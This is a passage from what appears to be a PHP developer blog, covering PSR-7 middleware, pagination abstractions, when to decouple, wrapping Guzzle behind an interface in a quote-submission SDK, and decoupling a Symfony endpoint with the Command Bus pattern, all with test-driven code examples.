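        $request = '/'.trim($request, '/');

        return null !== $next ? $next->handleRequest($request, $response) : $response;
    }
}

// Final handler: appends the path to the response it was given.
class EchoHandler implements PipelineHandler
{
    public function handleRequest($request, $response, PipelineHandler $next = null)
    {
        return $response.$request;
    }
}

$first = new TrimSlashHandler();
echo $first->handleRequest('quotes/', 'OK ', new EchoHandler()); // OK /quotes
```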
Middlewares are really powerful and PSR-7 would benefit greatly from them, but we're missing a standard. As long as one is missing, we're going to witness the creation of a wide range of "PSR-7 middlewares", all incompatible with each other.
Since this seems inevitable, maybe we should instead try to figure out a new standard that would allow composing all those middlewares?
Pagination libraries usually require a QueryBuilder:
// Usually in a controller
$queryBuilder = $this->itemRepository->queryBuilderForFindAll();
$results = $paginationService->paginate(
$queryBuilder,
$currentPageNumber,
$itemsPerPage
);
This is necessary because we need to get the results for the page as well as the total number of results (with a database this means two queries). Unfortunately this kind of logic tends to leak into our controllers, which is why Benjamin Eberlei suggests an elegant alternative:
// Can be done in a service
$result = $this->itemRepository->findAll();
// Can be done in a ViewListener
$page = $result->take($currentPageNumber, $itemsPerPage);
The QueryBuilder is actually wrapped in a Result, which can return either all the results or a single portion of them.
Its take method returns a Page which contains the results for that portion
as well as all the metadata we usually expect (page number, total elements, etc).
To make it possible he created porpaginas,
a small library that provides Result and Page as interfaces.
The actual pagination logic is delegated to the library of our choice, using adapters.
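To make the Result/Page idea tangible, here's a hypothetical in-memory implementation (porpaginas' real interfaces differ slightly; this only shows the "whole result or one portion" shape):

```php
<?php
// Hypothetical in-memory Result: the caller decides, late, whether it wants
// everything or just one slice with pagination metadata.
class ArrayResult
{
    private $items;

    public function __construct(array $items)
    {
        $this->items = $items;
    }

    // All results at once, when no pagination is needed.
    public function fetchAll()
    {
        return $this->items;
    }

    // A single portion plus the metadata a view usually needs.
    public function take($offset, $limit)
    {
        return array(
            'items' => array_slice($this->items, $offset, $limit),
            'total' => count($this->items),
            'offset' => $offset,
            'limit' => $limit,
        );
    }
}

$result = new ArrayResult(array('a', 'b', 'c', 'd'));
$page = $result->take(2, 2);
// $page['items'] holds the slice, $page['total'] the overall count
```

A database-backed implementation would run its two queries only when take is called, which is exactly what keeps the pagination logic out of the controller.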
Enjoy!
Decoupling can be considered a "Best Practice" as it is a good protection against external changes, but that doesn't mean it should always be applied everywhere.
This article is about mitigating the usage of this tool.
Decoupling is an important part of clean code, as it allows better readability.
For example instead of having a controller full of logic, we just have a Command class initialized with the input parameters that matter and a class name that describes the expected behavior. Inside the Command Handler, instead of implementation details we have a sequence of service calls that describe the behavior even further.
Clean code is all about making the application easier to maintain, so in theory this should be applied everywhere; but like every rule it can be abused, and its usefulness depends on the type of project.
It might seem strange, but some projects don't need to be maintained: Proof of Concepts, for example, are usually thrown away once the experiment they were designed for is done, so it doesn't make sense to take the time to make them perfect.
Some companies are also commissioned to bootstrap a project as fast as possible and are expected to hand the project over without any maintenance plan: usually the ones that promise the earliest delivery for the lowest price are selected. Again, it doesn't make sense to take the time to craft the most beautiful code if that's not what's been asked and paid for.
Trying to use the right tool for the right job is an important part of being pragmatic.
We've seen that some projects don't necessarily need decoupling, as we don't expect to maintain them. But sometimes a project might need decoupling in some parts and not in others.
As the saying goes, "Fool me once, shame on you, fool me twice, shame on me": since we can't know in advance which parts are going to change we might decide to couple things first. When an issue occurs due to the coupling, we can refactor to avoid further issues.
Last but not least, we can't always decouple from everything: the programming language itself can release backward incompatible changes, or we might want to switch to an entirely different one. Is it worth decoupling from the language?
Decoupling is a great tool that should be used when needed but the decision of when to use it depends on the context (project, team, industry, etc).
The rule of thumb number one is: don't blindly follow rules of thumb.
Libraries also share the same Backward Compatibility (BC) break issue: they change to solve their own concerns, regardless of our projects.
Here's a true story with Guzzle: we started using version 2 in our project and spread direct calls to it in different places. After a while we decided to use Flysystem and its SDK for Amazon S3, but we had a problem: it required Guzzle 3. This meant tracking down every usage of Guzzle in the project and adapting the calls to the new version. It's a daunting task, especially when the project doesn't have strong enough tests.
Later on, when Amazon S3 SDK stabilized, it started to require Guzzle 5...
Does that mean that we shouldn't use any libraries? Should we just not care and continue to use them the same way?
This article will explain how to avoid both extremes by decoupling from the library. It can be done using the Inversion of Control principle: instead of relying on the library directly, we rely on interfaces and provide an implementation that uses the library.
In the previous article, we started to create an endpoint allowing us to submit new quotes for a fortune application.
We're now going to create an SDK for it:
mkdir fortune-sdk
cd fortune-sdk
To do so, we'll create the composer.json file:
{
"name": "acme/fortune-sdk",
"description": "A PHP SDK for Fortune",
"type": "library",
"license": "MIT",
"autoload": {
"psr-4": {
"Acme\\FortuneSdk\\": "src/Acme/FortuneSdk"
}
},
"autoload-dev": {
"psr-4": {
"Acme\\FortuneSdk\\Fixtures\\": "fixtures",
"Acme\\FortuneSdk\\Tests\\": "tests"
}
},
"require": {
"php": ">=5.4"
},
"require-dev": {
"phpspec/phpspec": "^2.3",
"phpunit/phpunit": "^4.5",
"symfony/console": "^2.3",
"symfony/yaml": "^2.2"
}
}
Then create a test script:
#!/usr/bin/env sh
# bin/test.sh
composer --quiet --no-interaction update --optimize-autoloader > /dev/null
vendor/bin/phpspec --no-interaction run -f dot && vendor/bin/phpunit
And finally configure PHPUnit:
<?xml version="1.0" encoding="UTF-8"?>
<!-- phpunit.xml.dist -->
<!-- http://phpunit.de/manual/4.1/en/appendixes.configuration.html -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://schema.phpunit.de/4.1/phpunit.xsd"
backupGlobals="false"
colors="true"
bootstrap="vendor/autoload.php"
>
<testsuites>
<testsuite name="Fortune SDK Test Suite">
<directory>tests</directory>
</testsuite>
</testsuites>
</phpunit>
Since Guzzle might completely change next year, we're going to abstract it behind our own HTTP client:
<?php
// src/Acme/FortuneSdk/Remote/RequestHandler.php
namespace Acme\FortuneSdk\Remote;
use Psr\Http\Message\RequestInterface;
use Psr\Http\Message\ResponseInterface;
interface RequestHandler
{
/**
* @param RequestInterface $request
*
* @return ResponseInterface
*
* @throws ClientException If client throws an unexpected exception (e.g. connection error, etc)
*/
public function handle(RequestInterface $request);
}
We've decided to use the new PSR-7 standard:
composer require psr/http-message:^1.0
We'll hide any errors behind our own exception:
<?php
// src/Acme/FortuneSdk/Remote/ClientException.php
namespace Acme\FortuneSdk\Remote;
use RuntimeException;
class ClientException extends RuntimeException
{
}
Its first implementation will be with Guzzle 6:
<?php
// src/Acme/FortuneSdk/Remote/RequestHandler/GuzzleSixRequestHandler.php
namespace Acme\FortuneSdk\Remote\RequestHandler;
use Acme\FortuneSdk\Remote\ClientException;
use Acme\FortuneSdk\Remote\RequestHandler;
use Exception;
use GuzzleHttp\Client;
use GuzzleHttp\Exception\BadResponseException;
use Psr\Http\Message\RequestInterface;
class GuzzleSixRequestHandler implements RequestHandler
{
private $client;
public function __construct(Client $client)
{
$this->client = $client;
}
public function handle(RequestInterface $request)
{
try {
return $this->client->send($request);
} catch (BadResponseException $e) {
return $e->getResponse();
} catch (Exception $e) {
throw new ClientException('Client threw an unexpected exception', 0, $e);
}
}
}
And that's it. When Guzzle 7 is released, we'll just have to create a new implementation and throw away the old one, instead of having to replace calls everywhere in our project. We can even change our mind and use a completely different HTTP client (Buzz, etc).
Since we've started to softly depend on Guzzle, we need to install it with Composer:
composer require guzzlehttp/guzzle:^6.0
We can now create a functional test describing our service:
<?php
// tests/Quote/SubmitNewQuoteTest.php
namespace Acme\FortuneSdk\Tests\Quote;
use Acme\FortuneSdk\Quote\SubmitNewQuote\RemoteSubmitNewQuote;
use Acme\FortuneSdk\Fixtures\FixturesRequestHandler;
use PHPUnit_Framework_TestCase;
class SubmitNewQuoteTest extends PHPUnit_Framework_TestCase
{
const URL = 'http://example.com';
const QUOTE = 'Nobody expects the Spanish Inquisition!';
private $submitNewQuote;
protected function setUp()
{
$requestHandler = new FixturesRequestHandler();
$this->submitNewQuote = new RemoteSubmitNewQuote($requestHandler, self::URL);
}
/**
* @test
*/
public function it_can_submit_a_new_quote()
{
$quote = $this->submitNewQuote->submit(self::QUOTE);
self::assertSame(self::QUOTE, $quote['quote']);
}
}
Let's run the tests:
sh ./bin/test.sh
It fails because FixturesRequestHandler doesn't exist. It's an implementation
of RequestHandler designed for our tests: even if the endpoint actually existed,
relying on network calls in our tests would only make them brittle
(because it's slow and unreliable).
Let's create it:
<?php
// fixtures/FixturesRequestHandler.php
namespace Acme\FortuneSdk\Fixtures;
use Acme\FortuneSdk\Remote\RequestHandler;
use Psr\Http\Message\RequestInterface;
use Zend\Diactoros\Response;
use Zend\Diactoros\Stream;
class FixturesRequestHandler implements RequestHandler
{
private $routes;
public function __construct()
{
$this->routes = array(
array(
'controller' => new Controller\Quote\SubmitNewQuoteController(),
'pattern' => '#/quotes#',
'methods' => array('POST'),
),
);
}
public function handle(RequestInterface $request)
{
$path = $request->getUri()->getPath();
$method = $request->getMethod();
foreach ($this->routes as $route) {
if (1 === preg_match($route['pattern'], $path)) {
if (false === in_array($method, $route['methods'], true)) {
$body = new Stream('php://temp', 'w');
$body->write(json_encode(array(
'message' => "Method \"$method\" for route \"$path\" not supported (supported methods are: ".implode(', ', $route['methods']).")",
)));
return new Response($body, 405, array('Content-Type' => 'application/json'));
}
try {
return $route['controller']->handle($request);
} catch (FixturesException $e) {
$body = new Stream('php://temp', 'w');
$body->write($e->getMessage());
return new Response($body, $e->getCode(), array('Content-Type' => 'application/json'));
}
}
}
$body = new Stream('php://temp', 'w');
$body->write(json_encode(array(
'message' => "Route \"$path\" not found",
)));
return new Response($body, 404, array('Content-Type' => 'application/json'));
}
}
We've decided to rely on Zend Diactoros to build the responses, since it is the de facto implementation of PSR-7:
composer require zendframework/zend-diactoros:^1.0
We've opened up the possibility of managing many endpoints with this class. We now need to define a controller for the quote submission one:
<?php
// fixtures/Controller/Quote/SubmitNewQuoteController.php
namespace Acme\FortuneSdk\Fixtures\Controller\Quote;
use Acme\FortuneSdk\Remote\RequestHandler;
use Acme\FortuneSdk\Fixtures\FixturesException;
use Psr\Http\Message\RequestInterface;
use Zend\Diactoros\Response;
use Zend\Diactoros\Stream;
class SubmitNewQuoteController implements RequestHandler
{
public function handle(RequestInterface $request)
{
$submitNewQuote = json_decode($request->getBody()->__toString(), true);
if (false === isset($submitNewQuote['quote'])) {
throw FixturesException::make('Missing required "quote" parameter', 422);
}
$quote = (string) $submitNewQuote['quote'];
if ('' === $quote) {
throw FixturesException::make('Invalid "quote" parameter: must not be empty', 422);
}
$body = new Stream('php://temp', 'w');
$body->write(json_encode(array(
'id' => '',
'quote' => $quote
)));
return new Response($body, 201, array('Content-Type' => 'application/json'));
}
}
Finally we need to write the exception class:
<?php
// fixtures/FixturesException.php
namespace Acme\FortuneSdk\Fixtures;
use DomainException;
class FixturesException extends DomainException
{
/**
* @param string $message
* @param int $statusCode
*
* @return FixturesException
*/
public static function make($message, $statusCode)
{
return new self(json_encode(array('message' => $message)), $statusCode);
}
}
Let's run the tests:
sh ./bin/test.sh
They now fail because SubmitNewQuote doesn't exist.
First of all, we'll define our service as an interface:
<?php
// src/Acme/FortuneSdk/Quote/SubmitNewQuote.php
namespace Acme\FortuneSdk\Quote;
interface SubmitNewQuote
{
public function submit($quote);
}
This will allow developers using our SDK to create their own implementation for testing or extension purpose. It will also allow us to create Composite implementation: we can have a remote implementation that does the actual work, wrapped in a lazy cache implementation itself wrapped in a log implementation.
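That composite idea can be sketched with a hypothetical logging decorator wrapping any SubmitNewQuote implementation. The interface is duplicated from the article so the snippet stands alone, and the in-memory implementation is a stub standing in for the remote one:

```php
<?php
// Interface duplicated from the article so this example is self-contained.
interface SubmitNewQuote
{
    public function submit($quote);
}

// Stub standing in for the remote implementation.
class InMemorySubmitNewQuote implements SubmitNewQuote
{
    public function submit($quote)
    {
        return array('quote' => $quote);
    }
}

// Hypothetical decorator: records a log entry, then delegates.
class LogSubmitNewQuote implements SubmitNewQuote
{
    private $submitNewQuote;
    private $logs = array();

    public function __construct(SubmitNewQuote $submitNewQuote)
    {
        $this->submitNewQuote = $submitNewQuote;
    }

    public function submit($quote)
    {
        $this->logs[] = 'Submitting: '.$quote;

        return $this->submitNewQuote->submit($quote);
    }

    public function getLogs()
    {
        return $this->logs;
    }
}

$service = new LogSubmitNewQuote(new InMemorySubmitNewQuote());
$service->submit('Nobody expects the Spanish Inquisition!');
```

Because every layer implements the same interface, a cache decorator could wrap the remote one, itself wrapped in this log decorator, without any caller noticing.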
Here we'll just take care of the remote one, let's bootstrap its test:
vendor/bin/phpspec describe 'Acme\FortuneSdk\Quote\SubmitNewQuote\RemoteSubmitNewQuote'
And now we can write the tests:
<?php
// spec/Acme/FortuneSdk/Quote/SubmitNewQuote/RemoteSubmitNewQuoteSpec.php
namespace spec\Acme\FortuneSdk\Quote\SubmitNewQuote;
use Acme\FortuneSdk\Remote\RequestHandler;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
use Psr\Http\Message\ResponseInterface;
use Psr\Http\Message\StreamInterface;
class RemoteSubmitNewQuoteSpec extends ObjectBehavior
{
const URL = 'http://example.com';
const QUOTE = 'Nobody expects the Spanish Inquisition!';
function let(RequestHandler $requestHandler)
{
$this->beConstructedWith($requestHandler, self::URL);
}
function it_is_a_submit_new_quote()
{
$this->shouldImplement('Acme\FortuneSdk\Quote\SubmitNewQuote');
}
function it_calls_the_remote_endpoint(
RequestHandler $requestHandler,
ResponseInterface $response,
StreamInterface $stream
) {
$quote = array(
'quote' => self::QUOTE,
);
$request = Argument::type('Psr\Http\Message\RequestInterface');
$requestHandler->handle($request)->willReturn($response);
$response->getBody()->willReturn($stream);
$stream->__toString()->willReturn(json_encode($quote));
$this->submit(self::QUOTE)->shouldBe($quote);
}
}
In this test, we've used a wildcard to represent the request, since the service creates it internally. This comes at the cost of not knowing how it is built.
If we absolutely want to have control over this, we need to delegate the request construction to a factory, it then becomes possible to mock the request and check how it is built:
<?php
// spec/Acme/FortuneSdk/Quote/SubmitNewQuote/RemoteSubmitNewQuoteSpec.php
namespace spec\Acme\FortuneSdk\Quote\SubmitNewQuote;
use Acme\FortuneSdk\Remote\RequestFactory;
use Acme\FortuneSdk\Remote\RequestHandler;
use PhpSpec\ObjectBehavior;
use Psr\Http\Message\RequestInterface;
use Psr\Http\Message\ResponseInterface;
use Psr\Http\Message\StreamInterface;
class RemoteSubmitNewQuoteSpec extends ObjectBehavior
{
const URL = 'http://example.com';
const QUOTE = 'Nobody expects the Spanish Inquisition!';
function let(RequestFactory $requestFactory, RequestHandler $requestHandler)
{
$this->beConstructedWith($requestFactory, $requestHandler, self::URL);
}
function it_is_a_submit_new_quote()
{
$this->shouldImplement('Acme\FortuneSdk\Quote\SubmitNewQuote');
}
function it_calls_the_remote_endpoint(
RequestFactory $requestFactory,
RequestHandler $requestHandler,
RequestInterface $request,
ResponseInterface $response,
StreamInterface $stream
) {
$quote = array(
'quote' => self::QUOTE,
);
$requestFactory->make(self::URL.'/v1/quotes', 'POST', json_encode($quote), array(
'Content-Type' => 'application/json'
))->willReturn($request);
$requestHandler->handle($request)->willReturn($response);
$response->getBody()->willReturn($stream);
$stream->__toString()->willReturn(json_encode($quote));
$this->submit(self::QUOTE)->shouldBe($quote);
}
}
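The spec above mocks a RequestFactory that the article never implements. A possible shape for it could be the following (hypothetical, reverse-engineered from the mocked make call):

```php
<?php
// src/Acme/FortuneSdk/Remote/RequestFactory.php
namespace Acme\FortuneSdk\Remote;

use Psr\Http\Message\RequestInterface;

interface RequestFactory
{
    /**
     * @param string $url
     * @param string $method
     * @param string $body
     * @param array  $headers
     *
     * @return RequestInterface
     */
    public function make($url, $method, $body, array $headers = array());
}
```

A Diactoros-backed implementation would simply wrap the body in a Stream and return a new Request, mirroring what RemoteSubmitNewQuote does inline below.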
The choice between the first solution and the second one really depends on our preferences and on what we're trying to achieve. For the sake of this article, we'll stick to the first one (to avoid having to create the factory class and change the functional test, this article is already long enough!).
Let's run our tests to bootstrap the code:
vendor/bin/phpspec run
Now we can write the actual code:
<?php
// src/Acme/FortuneSdk/Quote/SubmitNewQuote/RemoteSubmitNewQuote.php
namespace Acme\FortuneSdk\Quote\SubmitNewQuote;
use Acme\FortuneSdk\Quote\SubmitNewQuote;
use Acme\FortuneSdk\Remote\RequestHandler;
use Zend\Diactoros\Request;
use Zend\Diactoros\Stream;
class RemoteSubmitNewQuote implements SubmitNewQuote
{
private $requestHandler;
private $url;
public function __construct(RequestHandler $requestHandler, $url)
{
$this->requestHandler = $requestHandler;
$this->url = $url;
}
public function submit($quote)
{
$body = new Stream('php://memory', 'w');
$body->write(json_encode(array(
'quote' => $quote,
)));
$request = new Request($this->url.'/v1/quotes', 'POST', $body, array(
'Content-Type' => 'application/json'
));
$quote = json_decode($this->requestHandler->handle($request)->getBody()->__toString(), true);
return $quote;
}
}
This should be sufficient to make our tests pass:
sh ./bin/test.sh
All green!
We now have an SDK that provides a SubmitNewQuote service allowing us to submit new quotes.
Since we've mocked the network connection, we can't be sure that our SDK actually works.
Manual testing can be sufficient in this case: we can build a Command Line Interface (CLI)
client and check for ourselves, once in a while, that everything works.
Inversion of Control is a principle that can come in handy when dealing with third-party libraries, especially ones that change often like Guzzle. It can be applied easily: instead of making our high level classes rely on concrete low level ones, we just need to introduce an interface.
Once again, all projects are different and this solution might not apply in every case. If we're building an application that we expect to maintain for a couple of years, it can be worth it to protect ourselves from external changes.
Reference: see the phpspec reference article
As always, different responsibilities also mean different reasons to change: frameworks have a history of Backward Compatibility (BC) breaks, and they do so regardless of your project.
Take for example Symfony: it only started to follow Semantic Versioning
from version 2.3. The upgrade to version 3 has been made easier by allowing developers
to know what was deprecated, but the removal of those features still means a lot of
work in your application.
The arrival of the new standard PSR-7 brings
a lot of questions about the future of Symfony: for now it allows choosing
between symfony/http-foundation and psr/http-message, but if Symfony doesn't
want to fall behind (Zend 3 is fully based on PSR-7)
it might have to introduce another big BC break (event listeners with the Request
and Response are not possible the way they are now with PSR-7).
Migrating Symfony applications (from symfony1, from symfony 2.0, etc) is so hard that it is a business on its own.
Does that mean that we shouldn't use any frameworks? Should we just not care and fully embrace frameworks?
This article will explain how to avoid both extremes, by decoupling from the framework. It can be done by restricting the framework to its infrastructure responsibilities (HTTP, CLI), by only using its entry points (Controller, Command) and by using the Command Bus pattern.
We're going to build part of a fortune application for our example, more precisely we're going to build an endpoint allowing us to submit quotes.
To do so, we'll bootstrap a Symfony application using the Empty Edition:
composer create-project gnugat/symfony-empty-edition fortune
cd fortune
We'll need to install our test frameworks:
composer require --dev phpunit/phpunit
composer require --dev phpspec/phpspec
Then add them to our test script:
#!/usr/bin/env sh
# bin/test.sh
echo ''
echo '// Building test environment'
rm -rf app/cache/test app/logs/*test.log
composer --quiet --no-interaction install --optimize-autoloader > /dev/null
php app/console --env=test --quiet cache:clear
echo ''
echo ' [OK] Test environment built'
echo ''
vendor/bin/phpspec run --format=dot && vendor/bin/phpunit
Finally we'll configure PHPUnit:
<?xml version="1.0" encoding="UTF-8"?>
<!-- phpunit.xml.dist -->
<!-- http://phpunit.de/manual/current/en/appendixes.configuration.html -->
<phpunit backupGlobals="false" colors="true" syntaxCheck="false" bootstrap="app/bootstrap.php">
<testsuites>
<testsuite name="System Tests">
<directory>tests</directory>
</testsuite>
</testsuites>
</phpunit>
Our endpoint will receive JSON encoded content. PHP does not populate $_POST with
this data, causing an empty $request->request. We can create an event listener
to fix this issue:
<?php
// src/AppBundle/EventListener/JsonRequestListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
class JsonRequestListener
{
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$hasBeenSubmitted = in_array($request->getMethod(), array('PATCH', 'POST', 'PUT'), true);
$isJson = (1 === preg_match('#application/json#', $request->headers->get('Content-Type')));
if (!$hasBeenSubmitted || !$isJson) {
return;
}
$data = json_decode($request->getContent(), true);
if (JSON_ERROR_NONE !== json_last_error()) {
$event->setResponse(new Response('{"error":"Invalid or malformed JSON"}', 400, array('Content-Type' => 'application/json')));
return;
}
$request->request->add($data ?: array());
}
}
This logic is infrastructure related, so it makes sense to keep it in AppBundle.
To enable it, configure it in the Dependency Injection Container:
# app/config/services/event_listener.yml
services:
app.json_request_listener:
class: AppBundle\EventListener\JsonRequestListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
We also need to make sure files in app/config/services are imported:
<?php
// app/config/importer.php
use Symfony\Component\Finder\Finder;
$finder = new Finder();
$files = $finder->files()->name('*.yml')->in(__DIR__.'/services');
foreach ($files as $file) {
$loader->import($file->getRealpath());
}
Our first step will be to describe how the endpoint should work, with a test:
<?php
// tests/AppBundle/Controller/QuoteControllerTest.php
namespace tests\AppBundle\Controller;
use AppKernel;
use PHPUnit_Framework_TestCase;
use Symfony\Component\HttpFoundation\Request;
class QuoteControllerTest extends PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$this->app = new AppKernel('test', false);
$this->app->boot();
}
/**
* @test
*/
public function it_submits_a_new_quote()
{
$headers = array('CONTENT_TYPE' => 'application/json');
$request = Request::create('/v1/quotes', 'POST', array(), array(), array(), $headers, json_encode(array(
'quote' => 'Nobody expects the spanish inquisition',
)));
$response = $this->app->handle($request);
self::assertSame(201, $response->getStatusCode(), $response->getContent());
}
}
Note: Testing only the status code is called "Smoke Testing" and is a very efficient way to check if the application is broken. Testing the content would be tedious and would make our test fragile, as the content might change often.
Let's run it:
./bin/test.sh
The tests fail because the controller doesn't exist. Let's fix that:
<?php
// src/AppBundle/Controller/QuoteController.php
namespace AppBundle\Controller;
use Acme\Fortune\Quote\SubmitNewQuote;
use Acme\Fortune\Quote\SubmitNewQuoteHandler;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class QuoteController
{
private $submitNewQuoteHandler;
public function __construct(SubmitNewQuoteHandler $submitNewQuoteHandler)
{
$this->submitNewQuoteHandler = $submitNewQuoteHandler;
}
public function submitNewAction(Request $request)
{
$submitNewQuote = new SubmitNewQuote(
$request->request->get('quote')
);
$newQuote = $this->submitNewQuoteHandler->handle($submitNewQuote);
return new Response(json_encode($newQuote), 201, array('Content-Type' => 'application/json'));
}
}
Now we need to configure the controller as a service:
# app/config/services/controller.yml
services:
app.quote_controller:
class: AppBundle\Controller\QuoteController
arguments:
- "@app.submit_new_quote_handler"
Then we need to configure the route:
# app/config/routings/quote.yml
submit_new_quote:
path: /v1/quotes
defaults:
_controller: app.quote_controller:submitNewAction
methods:
- POST
This file needs to be imported:
# app/config/routing.yml
quote:
resource: routings/quote.yml
Finally we can run the test again:
./bin/test.sh
It now fails for a different reason: SubmitNewQuote and its handler class don't exist.
SubmitNewQuote is a Data Transfer Object (DTO): its responsibility is to wrap
input parameters in a well named class (in this case a class that describes the action intended).
It's also the best place to do some basic validation on the input parameters.
Note: In the Command Bus pattern,
SubmitNewQuote would be a Command (different from the CLI Command).
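For readers unfamiliar with the pattern, here's a minimal, self-contained sketch of a Command Bus (real libraries do much more; all names here are hypothetical): commands are plain DTOs, and the bus maps each command class to the handler that knows how to process it.

```php
<?php
// A command is just a named DTO.
class PingCommand
{
}

// Its handler holds the actual behavior.
class PingHandler
{
    public function handle($command)
    {
        return 'pong';
    }
}

// The bus routes each command to the handler registered for its class.
class CommandBus
{
    private $handlers = array();

    public function register($commandClass, $handler)
    {
        $this->handlers[$commandClass] = $handler;
    }

    public function handle($command)
    {
        return $this->handlers[get_class($command)]->handle($command);
    }
}

$bus = new CommandBus();
$bus->register('PingCommand', new PingHandler());
echo $bus->handle(new PingCommand()); // pong
```

In this article the controller plays the role of the bus by calling SubmitNewQuoteHandler directly, which keeps the same Command/Handler separation without the extra routing layer.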
We'll write a test for this, but first we'll bootstrap the test class:
vendor/bin/phpspec describe 'Acme\Fortune\Quote\SubmitNewQuote'
Now we can describe the different validation rules:
<?php
// spec/Acme/Fortune/Quote/SubmitNewQuoteSpec.php
namespace spec\Acme\Fortune\Quote;
use PhpSpec\ObjectBehavior;
class SubmitNewQuoteSpec extends ObjectBehavior
{
const QUOTE = 'Nobody expects the spanish inquisition';
function it_fails_if_required_quote_parameter_is_missing()
{
$this->beConstructedWith(null);
$this->shouldThrow('Acme\Fortune\Exception\ValidationFailedException')->duringInstantiation();
}
function it_fails_if_quote_parameter_is_empty()
{
$this->beConstructedWith('');
$this->shouldThrow('Acme\Fortune\Exception\ValidationFailedException')->duringInstantiation();
}
}
Note: Since this class has nothing to do with Symfony, we don't put it in
AppBundle. By keeping it in its own namespace, we protect it from framework directory tree changes: for example, before AppBundle the norm was Acme\FortuneBundle. We also allow ourselves to move it to another framework (e.g. Laravel, Zend, etc).
Let's run the tests:
./bin/test.sh
It fails because the exception doesn't exist yet:
<?php
// src/Acme/Fortune/Exception/ValidationFailedException.php
namespace Acme\Fortune\Exception;
class ValidationFailedException extends FortuneException
{
}
We're making it a subtype of FortuneException: that way we can catch all exceptions
related to our code (all other exceptions can be considered Internal Server Errors).
<?php
// src/Acme/Fortune/Exception/FortuneException.php
namespace Acme\Fortune\Exception;
use DomainException;
class FortuneException extends DomainException
{
}
Now we need to create the Command:
<?php
// src/Acme/Fortune/Quote/SubmitNewQuote.php
namespace Acme\Fortune\Quote;
use Acme\Fortune\Exception\ValidationFailedException;
class SubmitNewQuote
{
public $quote;
public function __construct($quote)
{
if (null === $quote) {
throw new ValidationFailedException('Missing required "quote" parameter');
}
if ('' === $quote) {
throw new ValidationFailedException('Invalid "quote" parameter: must not be empty');
}
$this->quote = (string) $quote;
}
}
Running the tests again:
./bin/test.sh
Everything seems fine.
Instead of catching exceptions in our controllers we can create an event listener:
<?php
// src/AppBundle/EventListener/FortuneExceptionListener.php
namespace AppBundle\EventListener;
use Acme\Fortune\Exception\FortuneException;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseForExceptionEvent;
class FortuneExceptionListener
{
public function onKernelException(GetResponseForExceptionEvent $event)
{
$exception = $event->getException();
if (!$exception instanceof FortuneException) {
return;
}
$content = json_encode(array('error' => $exception->getMessage()));
$statusCode = Response::HTTP_UNPROCESSABLE_ENTITY;
$event->setResponse(new Response($content, $statusCode, array('Content-Type' => 'application/json')));
}
}
This lowers the risk of forgetting to catch an exception and it also keeps our controller slim.
Let's enable it in the DIC:
# app/config/services/event_listener.yml
services:
app.fortune_exception_listener:
class: AppBundle\EventListener\FortuneExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
app.json_request_listener:
class: AppBundle\EventListener\JsonRequestListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
SubmitNewQuoteHandler's responsibility is to validate SubmitNewQuote data against
business rules (e.g. no quote duplicates, author must exist, etc) and to call the
appropriate services to process it.
Reading its code feels like reading the details of a use case:
To handle the submission of a new quote, we need to generate a unique identifier and then we need to save the new quote.
Let's bootstrap its test:
vendor/bin/phpspec describe 'Acme\Fortune\Quote\SubmitNewQuoteHandler'
Then edit the test:
<?php
// spec/Acme/Fortune/Quote/SubmitNewQuoteHandlerSpec.php
namespace spec\Acme\Fortune\Quote;
use Acme\Fortune\Quote\SubmitNewQuote;
use Acme\Fortune\Quote\Service\SaveNewQuote;
use Acme\Fortune\Quote\Service\UniqueIdentifierGenerator;
use PhpSpec\ObjectBehavior;
class SubmitNewQuoteHandlerSpec extends ObjectBehavior
{
const ID = '921410e8-eb98-4f99-ba98-055d46980511';
const QUOTE = 'Nobody expects the spanish inquisition!';
function let(SaveNewQuote $saveNewQuote, UniqueIdentifierGenerator $uniqueIdentifierGenerator)
{
$this->beConstructedWith($saveNewQuote, $uniqueIdentifierGenerator);
}
function it_saves_new_quote(SaveNewQuote $saveNewQuote, UniqueIdentifierGenerator $uniqueIdentifierGenerator)
{
$submitNewQuote = new SubmitNewQuote(self::QUOTE);
$quote = array(
'id' => self::ID,
'quote' => self::QUOTE,
);
$uniqueIdentifierGenerator->generate()->willReturn(self::ID);
$saveNewQuote->save($quote)->shouldBeCalled();
$this->handle($submitNewQuote)->shouldBe($quote);
}
}
Let's run the tests:
./bin/test.sh
After generating interfaces for SaveNewQuote and UniqueIdentifierGenerator
and after bootstrapping the code for SubmitNewQuoteHandler, the test will fail
because we need to complete it:
<?php
// src/Acme/Fortune/Quote/SubmitNewQuoteHandler.php
namespace Acme\Fortune\Quote;
use Acme\Fortune\Quote\Service\SaveNewQuote;
use Acme\Fortune\Quote\Service\UniqueIdentifierGenerator;
class SubmitNewQuoteHandler
{
private $saveNewQuote;
private $uniqueIdentifierGenerator;
public function __construct(SaveNewQuote $saveNewQuote, UniqueIdentifierGenerator $uniqueIdentifierGenerator)
{
$this->saveNewQuote = $saveNewQuote;
$this->uniqueIdentifierGenerator = $uniqueIdentifierGenerator;
}
public function handle(SubmitNewQuote $submitNewQuote)
{
$quote = array(
'id' => $this->uniqueIdentifierGenerator->generate(),
'quote' => $submitNewQuote->quote,
);
$this->saveNewQuote->save($quote);
return $quote;
}
}
Now we can configure the service:
# app/config/services/quote.yml
services:
app.submit_new_quote_handler:
class: Acme\Fortune\Quote\SubmitNewQuoteHandler
arguments:
- "@app.save_new_quote"
- "@app.unique_identifier_generator"
Finally we can run the tests one last time:
./bin/test.sh
Almost green!
They fail because app.save_new_quote and app.unique_identifier_generator don't
exist yet. They will be the topic of another article ;) .
By restricting frameworks to their entry points (Controllers, Commands, etc.) and using the Command Bus to define our project's entry points (domain boundaries), we decouple from the framework and limit the impact of BC breaks.
Of course, all projects are different and this solution might not fit everywhere. RAD development is a robust solution for web agencies, especially when they are hired to bootstrap a project as fast as possible and then hand it over to their customer after a short period.
